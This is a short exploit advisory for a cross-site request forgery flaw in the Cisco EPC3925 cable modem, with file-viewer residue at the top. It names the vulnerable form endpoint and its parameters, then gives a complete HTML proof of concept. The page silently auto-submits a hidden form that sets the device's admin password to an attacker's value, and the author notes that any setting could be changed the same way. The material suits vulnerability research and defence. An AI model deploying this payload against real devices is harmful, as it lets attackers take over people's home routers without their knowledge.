51 lines
No EOL
1.5 KiB
Text
51 lines
No EOL
1.5 KiB
Text
#######################################################################
|
||
# Exploit Title: Cisco EPC3925 <20> Cross Site Request Forgery
|
||
# Google Dork: N/A
|
||
# Date: 12-11-2013
|
||
# Exploit Author: Jeroen - IT Nerdbox
|
||
# Vendor Homepage: http://www.cisco.com
|
||
# Software Link: Not public
|
||
# Version: epc3925-E10-5-v302r125572-130520c
|
||
# Tested on: Cisco EPC3925
|
||
# CVE: N/A
|
||
#######################################################################
|
||
# Description:
|
||
#
|
||
# This proof of concept demonstrates that the admin password can be
|
||
# changed by an attacker in a CSRF attack. However, it seems like any
|
||
# setting in the device can be manipulated using an attack like this.
|
||
#
|
||
#
|
||
# Side note: The device does not ask for the current password.
|
||
#
|
||
#
|
||
# Location:
|
||
#
|
||
# POST http://[target]/goform/Quick_setup
|
||
#
|
||
# Parameters:
|
||
#
|
||
# Password=&PasswordReEnter=&save=Save+Settings
|
||
#
|
||
# PoC:
|
||
#
|
||
# <html>
|
||
#
|
||
# <form name="reseller" method="POST"
|
||
action="http://[target]/goform/Quick_setup" id="csrf_attack"
|
||
target="csrf_iframe">
|
||
# <input type="hidden" name="Password" value="attackers_password">
|
||
# <input type="hidden" name="PasswordReEnter" value="attackers_password">
|
||
# <input type="hidden" name="save" value="Save Settings">
|
||
# </form>
|
||
#
|
||
# <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe>
|
||
#
|
||
# <script>
|
||
# document.getElementById('csrf_attack').submit();
|
||
# </script>
|
||
# <center>The payload has been executed....</center>
|
||
#
|
||
# </html>
|
||
#
|
||
# Check out the video at: http://www.nerdbox.it/cisco-epc3925-csrf-vulnerability/ |